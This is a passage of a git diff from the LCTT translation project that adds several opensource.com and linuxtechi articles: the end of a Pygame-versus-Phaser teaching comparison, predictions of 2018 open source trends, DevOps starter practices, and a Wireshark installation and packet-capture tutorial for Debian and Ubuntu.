look at the basic [Making your first Phaser game tutorial][15], by Alvin Ourrad and Richard Davey, to understand the challenge of using Phaser to teach programming to beginners. In JavaScript, global variables—variables that can be accessed anywhere in the program—are difficult to keep track of and often are the source of bugs that are challenging to solve. Richard and Alvin are expert programmers and use global variables intentionally to keep things concise. + +``` +var game = new Phaser.Game(800, 600, Phaser.AUTO, '', { preload: preload, create: create, update: update }); + +function preload() { + +    game.load.image('sky', 'assets/sky.png'); + +} + +var player; +var platforms; + +function create() { +    game.physics.startSystem(Phaser.Physics.ARCADE); +… +``` + +In their Phaser programming book  [_Interphase_ ,][16] Richard Davey and Ilija Melentijevic explain that global variables are commonly used in many Phaser projects because they make it easier to get things done quickly. + +> “If you’ve ever worked on a game of any significant size then this approach is probably already making you cringe slightly... So why do we do it? The reason is simply because it’s the most concise and least complicated way to demonstrate what Phaser can do.” + +Although structuring a Phaser application to use local variables and split things up nicely into separation of concerns is possible, that’s tough for kids to understand when they’re first learning to program. + +If you’re set on teaching your kids to code with JavaScript, or if they already know how to code in another language like Python, a good Phaser course is [The Complete Mobile Game Development Course][17], by [Pablo Farias Navarro][18]. Although the title focuses on mobile games, the actual course focuses on JavaScript and Phaser. The JavaScript and Phaser apps are moved to a mobile phone with [PhoneGap][19]. + +### 3\. Pygame comes with less assembly required + +Thanks to [Python Wheels][20], Pygame is now super [easy to install][21]. You can also install it on Fedora/Red Hat with the **yum** package manager: + +``` +sudo yum install python3-pygame +``` + +See the official [Pygame installation documentation][22] for more information. + +Although Phaser itself is even easier to install, it does require more knowledge to use. As mentioned previously, the student will need to assemble their JavaScript code within an HTML document with some CSS. In addition to the three languages—HTML, CSS, and JavaScript—Phaser also requires the use of Firefox or Chrome development tools and an editor. The most common editors for JavaScript are Sublime, Atom, VS Code (probably in that order). + +Phaser applications will not run if you open the HTML file in a browser directly, due to [same-origin policy][23]. You must run a web server and access the files by connecting to the web server. Fortunately, you don’t need to run Apache on your local computer; you can run something lightweight like [httpster][24] for most projects. + +### Advantages of Phaser and JavaScript + +With all the challenges of JavaScript and Phaser, why am I teaching them? Honestly, I held off for a long time. I worried about students learning variable hoisting and scope. I developed my own curriculum based on Pygame and Python, then I developed one based on Phaser. Eventually, I decided to use Pablo’s pre-made curriculum as a starting point.  + +There are really two reasons that I moved to JavaScript. First, JavaScript has emerged as a serious language used in serious applications. In addition to web applications, it’s used for mobile and server applications. JavaScript is everywhere, and it’s used widely in applications kids see every day. If their friends code in JavaScript, they'll likely want to as well. As I saw the momentum behind JavaScript, I looked into alternatives that could compile into JavaScript, primarily Dart and TypeScript. I didn’t mind the extra conversion step, but I still looked at JavaScript. + +In the end, I chose to use Phaser and JavaScript because I realized that the problems could be solved with JavaScript and a bit of work. High-quality debugging tools and the work of some exceptionally smart people have made JavaScript a language that is both accessible and useful for teaching kids to code. + +### Final word: Python vs. JavaScript + +When people ask me what language to start their kids with, I immediately suggest Python and Pygame. There are tons of great curriculum options, many of which are free. I used ["Making Games with Python & Pygame"][25] by Al Sweigart with my son. I also used  _[Think Python: How to Think Like a Computer Scientist][7]_ by Allen B. Downey. You can get Pygame on your Android phone with [RAPT Pygame][26] by [Tom Rothamel][27]. + +Despite my recommendation, I always suspect that kids soon move to JavaScript. And that’s okay—JavaScript is a mature language with great tools. They’ll have fun with JavaScript and learn a lot. But after years of helping my daughter’s older brother create cool games in Python, I’ll always have an emotional attachment to Python and Pygame. + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/craig-head-crop.png?itok=LlMnIq8m)][28] + + Craig Oda - First elected president and co-founder of Tokyo Linux Users Group. Co-author of "Linux Japanese Environment" book published by O'Reilly Japan. Part of core team that established first ISP in Asia. Former VP of product management and product marketing for major Linux company. Partner at Oppkey, developer relations consulting firm in Silicon Valley.[More about me][8] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/pygame + +作者:[Craig Oda ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/codetricity +[1]:https://opensource.com/resources/python?intcmp=7016000000127cYAAQ +[2]:https://opensource.com/resources/python/ides?intcmp=7016000000127cYAAQ +[3]:https://opensource.com/resources/python/gui-frameworks?intcmp=7016000000127cYAAQ +[4]:https://opensource.com/tags/python?intcmp=7016000000127cYAAQ +[5]:https://developers.redhat.com/?intcmp=7016000000127cYAAQ +[6]:https://opensource.com/article/17/11/pygame?rate=PV7Af00S0QwicZT2iv8xSjJrmJPdpfK1Kcm7LXxl_Xc +[7]:http://greenteapress.com/thinkpython/html/index.html +[8]:https://opensource.com/users/codetricity +[9]:https://opensource.com/user/46031/feed +[10]:https://opensource.com/users/scottnesbitt +[11]:https://opensource.com/article/17/10/news-october-14 +[12]:https://www.patreon.com/photonstorm/posts +[13]:https://www.pygame.org/news +[14]:https://cacm.acm.org/blogs/blog-cacm/176450-python-is-now-the-most-popular-introductory-teaching-language-at-top-u-s-universities/fulltext +[15]:http://phaser.io/tutorials/making-your-first-phaser-game +[16]:https://phaser.io/interphase +[17]:https://academy.zenva.com/product/the-complete-mobile-game-development-course-platinum-edition/ +[18]:https://gamedevacademy.org/author/fariazz/ +[19]:https://phonegap.com/ +[20]:https://pythonwheels.com/ +[21]:https://pypi.python.org/pypi/Pygame +[22]:http://www.pygame.org/wiki/GettingStarted#Pygame%20Installation +[23]:https://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html +[24]:https://simbco.github.io/httpster/ +[25]:https://inventwithpython.com/makinggames.pdf +[26]:https://github.com/renpytom/rapt-pygame-example +[27]:https://github.com/renpytom +[28]:https://opensource.com/users/codetricity +[29]:https://opensource.com/users/codetricity +[30]:https://opensource.com/users/codetricity +[31]:https://opensource.com/article/17/11/pygame#comments +[32]:https://opensource.com/tags/python +[33]:https://opensource.com/tags/programming diff --git a/sources/tech/20171129 10 open source technology trends for 2018.md b/sources/tech/20171129 10 open source technology trends for 2018.md new file mode 100644 index 0000000000..eb21c62ec9 --- /dev/null +++ b/sources/tech/20171129 10 open source technology trends for 2018.md @@ -0,0 +1,143 @@ +translating by wangy325... + + +10 open source technology trends for 2018 +============================================================ + +### What do you think will be the next open source tech trends? Here are 10 predictions. + +![10 open source technology trends for 2018](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/fireworks-newyear-celebrate.png?itok=6gXaznov "10 open source technology trends for 2018") +Image by : [Mitch Bennett][10]. Modified by Opensource.com. [CC BY-SA 4.0][11] + +Technology is always evolving. New developments, such as OpenStack, Progressive Web Apps, Rust, R, the cognitive cloud, artificial intelligence (AI), the Internet of Things, and more are putting our usual paradigms on the back burner. Here is a rundown of the top open source trends expected to soar in popularity in 2018. + +### 1\. OpenStack gains increasing acceptance + +[OpenStack][12] is essentially a cloud operating system that offers admins the ability to provision and control huge compute, storage, and networking resources through an intuitive and user-friendly dashboard. + +Many enterprises are using the OpenStack platform to build and manage cloud computing systems. Its popularity rests on its flexible ecosystem, transparency, and speed. It supports mission-critical applications with ease and lower costs compared to alternatives. But, OpenStack's complex structure and its dependency on virtualization, servers, and extensive networking resources has inhibited its adoption by a wider range of enterprises. Using OpenStack also requires a well-oiled machinery of skilled staff and resources. + +The OpenStack Foundation is working overtime to fill the voids. Several innovations, either released or on the anvil, would resolve many of its underlying challenges. As complexities decrease, OpenStack will surge in acceptance. The fact that OpenStack is already backed by many big software development and hosting companies, in addition to thousands of individual members, makes it the future of cloud computing. + +### 2\. Progressive Web Apps become popular + +[Progressive Web Apps][13] (PWA), an aggregation of technologies, design concepts, and web APIs, offer an app-like experience in the mobile browser. + +Traditional websites suffer from many inherent shortcomings. Apps, although offering a more personal and focused engagement than websites, place a huge demand on resources, including needing to be downloaded upfront. PWA delivers the best of both worlds. It delivers an app-like experience to users while being accessible on browsers, indexable on search engines, and responsive to fit any form factor. Like an app, a PWA updates itself to always display the latest real-time information, and, like a website, it is delivered in an ultra-safe HTTPS model. It runs in a standard container and is accessible to anyone who types in the URL, without having to install anything. + +PWAs perfectly suit the needs of today's mobile users, who value convenience and personal engagement over everything else. That this technology is set to soar in popularity is a no-brainer. + +### 3\. Rust to rule the roost + +Most programming languages come with safety vs. control tradeoffs. [Rust][14] is an exception. The language co-opts extensive compile-time checking to offer 100% control without compromising safety. The last [Pwn2Own][15] competition threw up many serious vulnerabilities in Firefox on account of its underlying C++ language. If Firefox had been written in Rust, many of those errors would have manifested as compile-time bugs and resolved before the product rollout stage. + +Rust's unique approach of built-in unit testing has led developers to consider it a viable first-choice open source language. It offers an effective alternative to languages such as C and Python to write secure code without sacrificing expressiveness. Rust has bright days ahead in 2018. + +### 4\. R user community grows + +The [R][16] programming language, a GNU project, is associated with statistical computing and graphics. It offers a wide array of statistical and graphical techniques and is extensible to boot. It starts where [S][17] ends. With the S language already the vehicle of choice for research in statistical methodology, R offers a viable open source route for data manipulation, calculation, and graphical display. An added benefit is R's attention to detail and care for the finer nuances. + +Like Rust, R's fortunes are on the rise. + +### 5\. XaaS expands in scope + +XaaS, an acronym for "anything as a service," stands for the increasing number of services delivered over the internet, rather than on premises. Although software as a service (SaaS), infrastructure as a service (IaaS), and platform as a service (PaaS) are well-entrenched, new cloud-based models, such as network as a service (NaaS), storage as a service (SaaS or StaaS), monitoring as a service (MaaS), and communications as a service (CaaS), are soaring in popularity. A world where anything and everything is available "as a service" is not far away. + +The scope of XaaS now extends to bricks-and-mortar businesses, as well. Good examples are companies such as Uber and Lyft leveraging digital technology to offer transportation as a service and Airbnb offering accommodations as a service. + +High-speed networks and server virtualization that make powerful computing affordable have accelerated the popularity of XaaS, to the point that 2018 may become the "year of XaaS." The unmatched flexibility, agility, and scalability will propel the popularity of XaaS even further. + +### 6\. Containers gain even more acceptance + +Container technology is the approach of packaging pieces of code in a standardized way so they can be "plugged and run" quickly in any environment. Container technology allows enterprises to cut costs and implementation times. While the potential of containers to revolutionize IT infrastructure has been evident for a while, actual container use has remained complex. + +Container technology is still evolving, and the complexities associated with the technology decrease with every advancement. The latest developments make containers quite intuitive and as easy as using a smartphone, not to mention tuned for today's needs, where speed and agility can make or break a business. + +### 7\. Machine learning and artificial intelligence expand in scope + +[Machine learning and AI][18] give machines the ability to learn and improve from experience without a programmer explicitly coding the instruction. + +These technologies are already well entrenched, with several open source technologies leveraging them for cutting-edge services and applications. + +[Gartner predicts][19] the scope of machine learning and artificial intelligence will expand in 2018\. Several greenfield areas, such as data preparation, integration, algorithm selection, training methodology selection, and model creation are all set for big-time enhancements through the infusion of machine learning. + +New open source intelligent solutions are set to change the way people interact with systems and transform the very nature of work. + +* Conversational platforms, such as chatbots, make the question-and-command experience, where a user asks a question and the platform responds, the default medium of interacting with machines. + +* Autonomous vehicles and drones, fancy fads today, are expected to become commonplace by 2018. + +* The scope of immersive experience will expand beyond video games and apply to real-life scenarios such as design, training, and visualization processes. + +### 8\. Blockchain becomes mainstream + +Blockchain has come a long way from Bitcoin. The technology is already in widespread use in finance, secure voting, authenticating academic credentials, and more. In the coming year, healthcare, manufacturing, supply chain logistics, and government services are among the sectors most likely to embrace blockchain technology. + +Blockchain distributes digital information. The information resides on millions of nodes, in shared and reconciled databases. The fact that it's not controlled by any single authority and has no single point of failure makes it very robust, transparent, and incorruptible. It also solves the threat of a middleman manipulating the data. Such inherent strengths account for blockchain's soaring popularity and explain why it is likely to emerge as a mainstream technology in the immediate future. + +### 9\. Cognitive cloud moves to center stage + +Cognitive technologies, such as machine learning and artificial intelligence, are increasingly used to reduce complexity and personalize experiences across multiple sectors. One case in point is gamification apps in the financial sector, which offer investors critical investment insights and reduce the complexities of investment models. Digital trust platforms reduce the identity-verification process for financial institutions by about 80%, improving compliance and reducing chances of fraud. + +Such cognitive cloud technologies are now moving to the cloud, making it even more potent and powerful. IBM Watson is the most well-known example of the cognitive cloud in action. IBM's UIMA architecture was made open source and is maintained by the Apache Foundation. DARPA's DeepDive project mirrors Watson's machine learning abilities to enhance decision-making capabilities over time by learning from human interactions. OpenCog, another open source platform, allows developers and data scientists to develop artificial intelligence apps and programs. + +Considering the high stakes of delivering powerful and customized experiences, these cognitive cloud platforms are set to take center stage over the coming year. + +### 10\. The Internet of Things connects more things + +At its core, the Internet of Things (IoT) is the interconnection of devices through embedded sensors or other computing devices that enable the devices (the "things") to send and receive data. IoT is already predicted to be the next big major disruptor of the tech space, but IoT itself is in a continuous state of flux. + +One innovation likely to gain widespread acceptance within the IoT space is Autonomous Decentralized Peer-to-Peer Telemetry ([ADEPT][20]), which is propelled by IBM and Samsung. It uses a blockchain-type technology to deliver a decentralized network of IoT devices. Freedom from a central control system facilitates autonomous communications between "things" in order to manage software updates, resolve bugs, manage energy, and more. + +### Open source drives innovation + +Digital disruption is the norm in today's tech-centric era. Within the technology space, open source is now pervasive, and in 2018, it will be the driving force behind most of the technology innovations. + +Which open source trends and technologies would you add to this list? Let us know in the comments. + +### Topics + + [Business][25][Yearbook][26][2017 Open Source Yearbook][27] + +### About the author + + [![Sreejith@Fingent](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/sreejith.jpg?itok=sdYNV49V)][21] Sreejith - I have been programming since 2000, and professionally since 2007\. I currently lead the Open Source team at [Fingent][6] as we work on different technology stacks, ranging from the "boring"(read tried and trusted) to the bleeding edge. I like building, tinkering with and breaking things, not necessarily in that order. Hit me up at: [https://www.linkedin.com/in/futuregeek/][7][More about me][8] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/10-open-source-technology-trends-2018 + +作者:[Sreejith ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/sreejith +[1]:https://opensource.com/resources/what-is-openstack?intcmp=7016000000127cYAAQ +[2]:https://opensource.com/resources/openstack/tutorials?intcmp=7016000000127cYAAQ +[3]:https://opensource.com/tags/openstack?intcmp=7016000000127cYAAQ +[4]:https://www.rdoproject.org/?intcmp=7016000000127cYAAQ +[5]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018?rate=GJqOXhiWvZh0zZ6WVTUzJ2TDJBpVpFhngfuX9V-dz4I +[6]:https://www.fingent.com/ +[7]:https://www.linkedin.com/in/futuregeek/ +[8]:https://opensource.com/users/sreejith +[9]:https://opensource.com/user/185026/feed +[10]:https://www.flickr.com/photos/mitchell3417/9206373620 +[11]:https://creativecommons.org/licenses/by-sa/4.0/ +[12]:https://www.openstack.org/ +[13]:https://developers.google.com/web/progressive-web-apps/ +[14]:https://www.rust-lang.org/ +[15]:https://en.wikipedia.org/wiki/Pwn2Own +[16]:https://en.wikipedia.org/wiki/R_(programming_language) +[17]:https://en.wikipedia.org/wiki/S_(programming_language) +[18]:https://opensource.com/tags/artificial-intelligence +[19]:https://sdtimes.com/gartners-top-10-technology-trends-2018/ +[20]:https://insights.samsung.com/2016/03/17/block-chain-mobile-and-the-internet-of-things/ +[21]:https://opensource.com/users/sreejith +[22]:https://opensource.com/users/sreejith +[23]:https://opensource.com/users/sreejith +[24]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018#comments +[25]:https://opensource.com/tags/business +[26]:https://opensource.com/tags/yearbook +[27]:https://opensource.com/yearbook/2017 diff --git a/sources/tech/20171129 5 best practices for getting started with DevOps.md b/sources/tech/20171129 5 best practices for getting started with DevOps.md new file mode 100644 index 0000000000..962f37aaf4 --- /dev/null +++ b/sources/tech/20171129 5 best practices for getting started with DevOps.md @@ -0,0 +1,94 @@ +5 best practices for getting started with DevOps +============================================================ + +### Are you ready to implement DevOps, but don't know where to begin? Try these five best practices. + + +![5 best practices for getting started with DevOps](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/devops-gears.png?itok=rUejbLQX "5 best practices for getting started with DevOps") +Image by :  + +[Andrew Magill][8]. Modified by Opensource.com. [CC BY 4.0][9] + +DevOps often stymies early adopters with its ambiguity, not to mention its depth and breadth. By the time someone buys into the idea of DevOps, their first questions usually are: "How do I get started?" and "How do I measure success?" These five best practices are a great road map to starting your DevOps journey. + +### 1\. Measure all the things + +You don't know for sure that your efforts are even making things better unless you can quantify the outcomes. Are my features getting out to customers more rapidly? Are fewer defects escaping to them? Are we responding to and recovering more quickly from failure? + +Before you change anything, think about what kinds of outcomes you expect from your DevOps transformation. When you're further into your DevOps journey, you'll enjoy a rich array of near-real-time reports on everything about your service. But consider starting with these two metrics: + +* **Time to market** measures the end-to-end, often customer-facing, business experience. It usually begins when a feature is formally conceived and ends when the customer can consume the feature in production. Time to market is not mainly an engineering team metric; more importantly it shows your business' complete end-to-end efficiency in bringing valuable new features to market and isolates opportunities for system-wide improvement. + +* **Cycle time** measures the engineering team process. Once work on a new feature starts, when does it become available in production? This metric is very useful for understanding the efficiency of the engineering team and isolating opportunities for team-level improvement. + +### 2\. Get your process off the ground + +DevOps success requires an organization to put a regular (and hopefully effective) process in place and relentlessly improve upon it. It doesn't have to start out being effective, but it must be a regular process. Usually that it's some flavor of agile methodology like Scrum or Scrumban; sometimes it's a Lean derivative. Whichever way you go, pick a formal process, start using it, and get the basics right. + +Regular inspect-and-adapt behaviors are key to your DevOps success. Make good use of opportunities like the stakeholder demo, team retrospectives, and daily standups to find opportunities to improve your process. + +A lot of your DevOps success hinges on people working effectively together. People on a team need to work from a common process that they are empowered to improve upon. They also need regular opportunities to share what they are learning with other stakeholders, both upstream and downstream, in the process. + +Good process discipline will help your organization consume the other benefits of DevOps at the great speed that comes as your success builds. + +Although it's common for more development-oriented teams to successfully adopt processes like Scrum, operations-focused teams (or others that are more interrupt-driven) may opt for a process with a more near-term commitment horizon, such as Kanban. + +### 3\. Visualize your end-to-end workflow + +There is tremendous power in being able to see who's working on what part of your service at any given time. Visualizing your workflow will help people know what they need to work on next, how much work is in progress, and where the bottlenecks are in the process. + +You can't effectively limit work in process until you can see it and quantify it. Likewise, you can't effectively eliminate bottlenecks until you can clearly see them. + +Visualizing the entire workflow will help people in all parts of the organization understand how their work contributes to the success of the whole. It can catalyze relationship-building across organizational boundaries to help your teams collaborate more effectively towards a shared sense of success. + +### 4\. Continuous all the things + +DevOps promises a dizzying array of compelling automation. But Rome wasn't built in a day. One of the first areas you can focus your efforts on is [continuous integration][10] (CI). But don't stop there; you'll want to follow quickly with [continuous delivery][11] (CD) and eventually continuous deployment. + +Your CD pipeline is your opportunity to inject all manner of automated quality testing into your process. The moment new code is committed, your CD pipeline should run a battery of tests against the code and the successfully built artifact. The artifact that comes out at the end of this gauntlet is what progresses along your process until eventually it's seen by customers in production. + +Another "continuous" that doesn't get enough attention is continuous improvement. That's as simple as setting some time aside each day to ask your colleagues: "What small thing can we do today to get better at how we do our work?" These small, daily changes compound over time into more profound results. You'll be pleasantly surprised! But it also gets people thinking all the time about how to improve things. + +### 5\. Gherkinize + +Fostering more effective communication across your organization is crucial to fostering the sort of systems thinking prevalent in successful DevOps journeys. One way to help that along is to use a shared language between the business and the engineers to express the desired acceptance criteria for new features. A good product manager can learn [Gherkin][12] in a day and begin using it to express acceptance criteria in an unambiguous, structured form of plain English. Engineers can use this Gherkinized acceptance criteria to write acceptance tests against the criteria, and then develop their feature code until the tests pass. This is a simplification of [acceptance test-driven development][13](ATDD) that can also help kick start your DevOps culture and engineering practice. + +### Start on your journey + +Don't be discouraged by getting started with your DevOps practice. It's a journey. And hopefully these five ideas give you solid ways to get started. + + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/headshot_4.jpg?itok=jntfDCfX)][14] + + Magnus Hedemark - Magnus has been in the IT industry for over 20 years, and a technology enthusiast for most of his life. He's presently Manager of DevOps Engineering at UnitedHealth Group. In his spare time, Magnus enjoys photography and paddling canoes. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/5-keys-get-started-devops + +作者:[Magnus Hedemark ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/magnus919 +[1]:https://opensource.com/tags/devops?src=devops_resource_menu1 +[2]:https://opensource.com/resources/devops?src=devops_resource_menu2 +[3]:https://www.openshift.com/promotions/devops-with-openshift.html?intcmp=7016000000127cYAAQ&src=devops_resource_menu3 +[4]:https://enterprisersproject.com/article/2017/5/9-key-phrases-devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu4 +[5]:https://www.redhat.com/en/insights/devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu5 +[6]:https://opensource.com/article/17/11/5-keys-get-started-devops?rate=oEOzMXx1ghbkfl2a5ae6AnvO88iZ3wzkk53K2CzbDWI +[7]:https://opensource.com/user/25739/feed +[8]:https://ccsearch.creativecommons.org/image/detail/7qRx_yrcN5isTMS0u9iKMA== +[9]:https://creativecommons.org/licenses/by-sa/4.0/ +[10]:https://martinfowler.com/articles/continuousIntegration.html +[11]:https://martinfowler.com/bliki/ContinuousDelivery.html +[12]:https://cucumber.io/docs/reference +[13]:https://en.wikipedia.org/wiki/Acceptance_test%E2%80%93driven_development +[14]:https://opensource.com/users/magnus919 +[15]:https://opensource.com/users/magnus919 +[16]:https://opensource.com/users/magnus919 +[17]:https://opensource.com/tags/devops diff --git a/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md b/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md new file mode 100644 index 0000000000..d3ba75da14 --- /dev/null +++ b/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md @@ -0,0 +1,185 @@ +Translating by filefi + + +How to Install and Use Wireshark on Debian 9 / Ubuntu 16.04 / 17.10 +============================================================ + +by [Pradeep Kumar][1] · Published November 29, 2017 · Updated November 29, 2017 + + [![wireshark-Debian-9-Ubuntu 16.04 -17.10](https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Debian-9-Ubuntu-16.04-17.10.jpg)][2] + +Wireshark is free and open source, cross platform, GUI based Network packet analyzer that is available for Linux, Windows, MacOS, Solaris etc. It captures network packets in real time & presents them in human readable format. Wireshark allows us to monitor the network packets up to microscopic level. Wireshark also has a command line utility called ‘tshark‘ that performs the same functions as Wireshark but through terminal & not through GUI. + +Wireshark can be used for network troubleshooting, analyzing, software & communication protocol development & also for education purposed. Wireshark uses a library called ‘pcap‘ for capturing the network packets. + +Wireshark comes with a lot of features & some those features are; + +* Support for a hundreds of protocols for inspection, + +* Ability to capture packets in real time & save them for later offline analysis, + +* A number of filters to analyzing data, + +* Data captured can be compressed & uncompressed on the fly, + +* Various file formats for data analysis supported, output can also be saved to XML, CSV, plain text formats, + +* data can be captured from a number of interfaces like ethernet, wifi, bluetooth, USB, Frame relay , token rings etc. + +In this article, we will discuss how to install Wireshark on Ubuntu/Debain machines & will also learn to use Wireshark for capturing network packets. + +#### Installation of Wireshark on Ubuntu 16.04 / 17.10 + +Wireshark is available with default Ubuntu repositories & can be simply installed using the following command. But there might be chances that you will not get the latest version of wireshark. + +``` +linuxtechi@nixworld:~$ sudo apt-get update +linuxtechi@nixworld:~$ sudo apt-get install wireshark -y +``` + +So to install latest version of wireshark we have to enable or configure official wireshark repository. + +Use the beneath commands one after the another to configure repository and to install latest version of Wireshark utility + +``` +linuxtechi@nixworld:~$ sudo add-apt-repository ppa:wireshark-dev/stable +linuxtechi@nixworld:~$ sudo apt-get update +linuxtechi@nixworld:~$ sudo apt-get install wireshark -y +``` + +Once the Wireshark is installed execute the below command so that non-root users can capture live packets of interfaces, + +``` +linuxtechi@nixworld:~$ sudo setcap 'CAP_NET_RAW+eip CAP_NET_ADMIN+eip' /usr/bin/dumpcap +``` + +#### Installation of Wireshark on Debian 9 + +Wireshark package and its dependencies are already present in the default debian 9 repositories, so to install latest and stable version of Wireshark on Debian 9, use the following command: + +``` +linuxtechi@nixhome:~$ sudo apt-get update +linuxtechi@nixhome:~$ sudo apt-get install wireshark -y +``` + +During the installation, it will prompt us to configure dumpcap for non-superusers, + +Select ‘yes’ and then hit enter. + + [![Configure-Wireshark-Debian9](https://www.linuxtechi.com/wp-content/uploads/2017/11/Configure-Wireshark-Debian9-1024x542.jpg)][3] + +Once the Installation is completed, execute the below command so that non-root users can also capture the live packets of the interfaces. + +``` +linuxtechi@nixhome:~$ sudo chmod +x /usr/bin/dumpcap +``` + +We can also use the latest source package to install the wireshark on Ubuntu/Debain & many other Linux distributions. + +#### Installing Wireshark using source code on Debian / Ubuntu Systems + +Firstly download the latest source package (which is 2.4.2 at the time for writing this article), use the following command, + +``` +linuxtechi@nixhome:~$ wget https://1.as.dl.wireshark.org/src/wireshark-2.4.2.tar.xz +``` + +Next extract the package & enter into the extracted directory, + +``` +linuxtechi@nixhome:~$ tar -xf wireshark-2.4.2.tar.xz -C /tmp +linuxtechi@nixhome:~$ cd /tmp/wireshark-2.4.2 +``` + +Now we will compile the code with the following commands, + +``` +linuxtechi@nixhome:/tmp/wireshark-2.4.2$ ./configure --enable-setcap-install +linuxtechi@nixhome:/tmp/wireshark-2.4.2$ make +``` + +Lastly install the compiled packages to install Wireshark on the system, + +``` +linuxtechi@nixhome:/tmp/wireshark-2.4.2$ sudo make install +linuxtechi@nixhome:/tmp/wireshark-2.4.2$ sudo ldconfig +``` + +Upon installation a separate group for Wireshark will also be created, we will now add our user to the group so that it can work with wireshark otherwise you might get ‘permission denied‘ error when starting wireshark. + +To add the user to the wireshark group, execute the following command, + +``` +linuxtechi@nixhome:~$ sudo usermod -a -G wireshark linuxtechi +``` + +Now we can start wireshark either from GUI Menu or from terminal with this command, + +``` +linuxtechi@nixhome:~$ wireshark +``` + +#### Access Wireshark on Debian 9 System + + [![Access-wireshark-debian9](https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-debian9-1024x664.jpg)][4] + +Click on Wireshark icon + + [![Wireshark-window-debian9](https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-debian9-1024x664.jpg)][5] + +#### Access Wireshark on Ubuntu 16.04 / 17.10 + + [![Access-wireshark-Ubuntu](https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-Ubuntu-1024x664.jpg)][6] + +Click on Wireshark icon + + [![Wireshark-window-Ubuntu](https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-Ubuntu-1024x664.jpg)][7] + +#### Capturing and Analyzing packets + +Once the wireshark has been started, we should be presented with the wireshark window, example is shown above for Ubuntu and Debian system. + + [![wireshark-Linux-system](https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Linux-system.jpg)][8] + +All these are the interfaces from where we can capture the network packets. Based on the interfaces you have on your system, this screen might be different for you. + +We are selecting ‘enp0s3’ for capturing the network traffic for that inteface. After selecting the inteface, network packets for all the devices on our network start to populate (refer to screenshot below) + + [![Capturing-Packet-from-enp0s3-Ubuntu-Wireshark](https://www.linuxtechi.com/wp-content/uploads/2017/11/Capturing-Packet-from-enp0s3-Ubuntu-Wireshark-1024x727.jpg)][9] + +First time we see this screen we might get overwhelmed by the data that is presented in this screen & might have thought how to sort out this data but worry not, one the best features of Wireshark is its filters. + +We can sort/filter out the data based on IP address, Port number, can also used source & destination filters, packet size etc & can also combine 2 or more filters together to create more comprehensive searches. We can either write our filters in ‘Apply a Display Filter‘ tab , or we can also select one of already created rules. To select pre-built filter, click on ‘flag‘ icon , next to ‘Apply a Display Filter‘ tab, + + [![Filter-in-wireshark-Ubuntu](https://www.linuxtechi.com/wp-content/uploads/2017/11/Filter-in-wireshark-Ubuntu-1024x727.jpg)][10] + +We can also filter data based on the color coding, By default, light purple is TCP traffic, light blue is UDP traffic, and black identifies packets with errors , to see what these codes mean, click View -> Coloring Rules, also we can change these codes. + + [![Packet-Colouring-Wireshark](https://www.linuxtechi.com/wp-content/uploads/2017/11/Packet-Colouring-Wireshark-1024x682.jpg)][11] + +After we have the results that we need, we can then click on any of the captured packets to get more details about that packet, this will show all the data about that network packet. + +Wireshark is an extremely powerful tool takes some time to getting used to & make a command over it, this tutorial will help you get started. Please feel free to drop in your queries or suggestions in the comment box below. + +-------------------------------------------------------------------------------- + +via: https://www.linuxtechi.com + +作者:[Pradeep Kumar][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxtechi.com/author/pradeep/ +[1]:https://www.linuxtechi.com/author/pradeep/ +[2]:https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Debian-9-Ubuntu-16.04-17.10.jpg +[3]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Configure-Wireshark-Debian9.jpg +[4]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-debian9.jpg +[5]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-debian9.jpg +[6]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-Ubuntu.jpg +[7]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-Ubuntu.jpg +[8]:https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Linux-system.jpg +[9]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Capturing-Packet-from-enp0s3-Ubuntu-Wireshark.jpg +[10]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Filter-in-wireshark-Ubuntu.jpg +[11]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Packet-Colouring-Wireshark.jpg diff --git 